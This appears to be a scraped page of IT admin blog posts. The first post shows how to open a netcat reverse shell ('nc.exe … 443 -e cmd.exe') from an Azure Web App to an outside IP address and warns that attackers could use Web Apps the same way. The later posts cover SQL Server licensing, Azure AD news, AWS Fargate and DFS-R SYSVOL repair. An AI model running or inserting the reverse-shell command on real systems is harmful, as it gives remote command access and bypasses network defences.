$base64AuthInfo = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes((“{0}:{1}” -f $username, $password)))
$userAgent = “powershell/1.0”
$apiUrl = “https://webapprg09.scm.azurewebsites.net/api/triggeredwebjobs/reverse/run”
Invoke-WebRequest -Uri $apiUrl -Headers @{Authorization=(“Basic {0}” -f $base64AuthInfo)} -UserAgent $userAgent -Method POST -Debug

First, you need to invoke server using:

netcat -l -p 443

Reverse shell to your WebApp – Console to Azure WebApp from your text environment like bash

As far I remember we can use console access to your Azure Web App – it is available via webbrowser, via Kudu, Console Access or via App Service Editor – wher you can upload files. It looks like this:

But it is not always very convenient to use it via web broswer especially when you are working on not so good internet connection or would like monitor logs.

You can use netcat to establish a connection from WebApp to your workstatnion. How to do it.

Just on the machine where you wan to use text console just install netcat using:

apt-get -y install netcat

and start to wait for the incoming connection. In this example, we will use a 443 port.

netcat -l -p 443

In your Web App upload nc.exe (source https://eternallybored.org/misc/netcat) and run it:

nc.exe 40.113.139.194 443 -e cmd.exe

Please be aware that nc.exe in Windows 10 is a unwanted software, so just after unzip you have only several seconds to upload it to the Web App.

What is it for?

The main reason for this blog-post is that Web App can be used as an enter point to your infrastructure and should be protected. A similar code can be run from your Web App via www and establish a reverse shell. It could be also dangerous especially when your Web App use connected to your private Virtual Network. In this way, a hacker can enter via your Web App to your Environment in Virtual Machine.

Cloud is always Shared Responsibility model – and you are also responsible for securing your environments, scan for unwonted files and filter egress and ingress traffic that it is possible in App Service Environment or via Application Gateway.

SQL Server Software Assurance Licensing Benefits for Disaster Recovery

If a customer is on-premises, then they get the following with Software Assurance for every core that is deployed on the primary:

  • One free passive core for HA or DR on-premises;
  • One free passive core for DR (async replication only);
  • One free passive core for DR on SQL Server on Azure VM (async replication only).

 

If a customer is on Azure VM, then they get the following with Software Assurance for every core that is deployed on the primary:

  • One free passive core for HA or DR on Azure VM;
  • One free passive core for DR on Azure VM (async replication only).

 

Passive SQL Server Instance – the following operations are allowed a passive secondary :

  • Database consistency — Maintenance operation;
  • Log Backups;
  • Full Backups;
  • Monitoring applications can connect and gather data.

News from the last quarter of 2019 year in the field of Azure Active Directory

Successor of Azure AD Connect: Azure AD Connect cloud

https://docs.microsoft.com/en-us/azure/active-directory/cloud-provisioning/what-is-cloud-provisioning

Azure AD authentication to Windows VMs

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-authentication-to-windows-vms-in-azure-now-in-public/ba-p/827840

Conditional Access report-only mode

Evaluate impacts of new policies before rolling them out across the entire organization.

Monitor impact with Azure Monitor and the new Conditional Access Insights workbook.

News in Identity Protection

  • Added and enhanced signals
  • New detections
  • Improved APIs
  • New user interface
  • Azure Sentinel integration

https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection

Security Defaults

Preconfigured security settings for common attacks

Basic level of security at no extra cost

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults

New build-in roles in Azure AD

  • Global reader
  • Authentication admin
  • Privileged authentication admin
  • Azure DevOps admin
  • Security operator
  • Several B2C roles
  • Group admin
  • Office apps admin
  • Compliance data admin
  • External identity provider admin
  • Kaizala admin
  • Message center privacy reader
  • Password admin
  • Search admin
  • Search editor

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/16-new-built-in-roles-including-global-reader-now-available-in/ba-p/900749

https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#available-roles

Azure AD entitlement management

  • Govern employee and partner access at enterprise scale
  • Automate employee and partner access requests, approvals, auditing and review

https://docs.microsoft.com/en-us/azure/active-directory/governance/entitlement-management-overview

Admin consent workflow

Admin consent workflow – gives end users a way to request access to applications that require admin consent.

Without an admin consent workflow, a user in a tenant where user consent is disabled will be blocked when they try to access any app that requires permissions to access organizational data.

  • Users can request access when user consent is disabled
  • Users can request access when apps request permissions that require admin consent
  • Gives admins a secure way to receive and process access requests
  • Users are notified of admin action

https://aka.ms/adminconsentworkflow/

Secure legacy apps with app delivery controllers and networks

  • Simplify secure access to on-premises legacy-auth based apps
  • Access apps that use Kerberos, header-based auth, form-based auth, LDAP, NTLM, RDP, SSH
  • F5, Citrix, Akamai, ZScaler
  • Allow use of conditional access and password less auth with on-prem apps

https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/secure-hybrid-access

Migrate to cloud authentication by using staged rollout

Configure groups of users to use cloud authentication instead of federation

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-staged-rollout

Passwordless security key sign in to on-premises resources

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/replace-passwords-with-a-biometric-security-key/ba-p/827844

Forest trust to an on-premises domain in Azure Active Directory Domain Services

https://docs.microsoft.com/en-us/azure/active-directory-domain-services/tutorial-create-forest-trust

Microsoft identity platform authentication libraries updates

https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-v2-libraries

Direct federation with AD FS and third-party providers for guest users

https://docs.microsoft.com/pl-pl/azure/active-directory/b2b/direct-federation

Tutorials for integrating SaaS applications with Azure Active Directory

https://docs.microsoft.com/azure/active-directory/saas-apps/tutorial-list

 

AWS Fargate Cluster coexistence with EC2 instances / Autoscaling Capacity Providers

There is a possibility add to your AWS Fargate Cluster Capacity Providers with autoscaling EC2 instances. You can use it to, debug some Containers – you can just log-in to EC2, where your container is running or optimize the use of EC2 / Fargate instances, especially when you use reserved EC2 instances.

When you add directly Autosaling EC2 instances as Capacity Providers you can receive this kind of errors:

unable to place a task because no container instance met all of its requirements

or

No Container Instances were found in your cluster

The trick is – when you create Launch Configuration please select Community AMI eg.: amzn2-ami-ecs-hvm-2.0.20191212-x86_64-ebs – of course, choose the latest one.

Chose also IAM permission: IAM role as ecsInstanceRole and the most important provide this in user data:

#!/bin/bash
echo ECS_CLUSTER=LastFinal >> /etc/ecs/ecs.config
sudo iptables –insert FORWARD 1 –in-interface docker+ –destination 169.254.169.254/32 –jump DROP
sudo service iptables save
echo ECS_AWSVPC_BLOCK_IMDS=true >> /etc/ecs/ecs.config

After you create autoscaling your instances should bring to live and you should them in your Fargate Cluster:

Now you can add the Capacity provider and Managed termination protection should be disabled.

And now you can Run your Tasks as a Fargate or as an EC2 launch type. Please remember that the Task is compatible with EC2.

Launch command line:

aws ecs create-service –capacity-provider-strategy capacityProvider=EC2CapacityProvider,weight=1 –cluster LastFinal –service-name shellexample –task-definition shell:2 –desired-count 1 –network-configuration “awsvpcConfiguration={subnets=[subnet-068457290b918bf38],securityGroups=[sg-0563e9b190a2ccf65]}”

This member is waiting for initial replication for replicated folder SYSVOL Share and is not currently participating in replication.

This is a similar problem to FRS reinitialize File Replication Service problem described for an example here: https://support.microsoft.com/en-us/help/290762/using-the-burflags-registry-key-to-reinitialize-file-replication-servi

 

But we need to do it to DFS-R, fast steps:

 

  1. On source domain controller stop DFS Replication Service.
  2. Open ADSI Edit and msDFSR-Enabled to False, here:


     

  3. Set msDFSR—Options to 1


  4. Do:

    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

     

  5. On all Domain Controllers Open ADSI Edit and msDFSR-Enabled to False, here:


  6. repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  7. Start DFS Replication Service
  8. Open ADSI Edit and msDFSR-Enabled to True on primary Domain Controller.
  9. Issue DFSRDIAG POLLAD
    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  10. On every Domain Controller Open ADSI Edit and set msDFSR-Enabled to True
  11. Issue DFSRDIAG POLLAD
    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  12. Now replication of SYSVOL should work again.
«< 3 4 5 6 7 >»
Projekt i wykonanie: Mobiconnect i fast-sms.net   |    Regulamin
Ta strona korzysta z ciasteczek aby świadczyć usługi na najwyższym poziomie. Dalsze korzystanie ze strony oznacza, że zgadzasz się na ich użycie.Zgoda

Added to Cart

Keep Shopping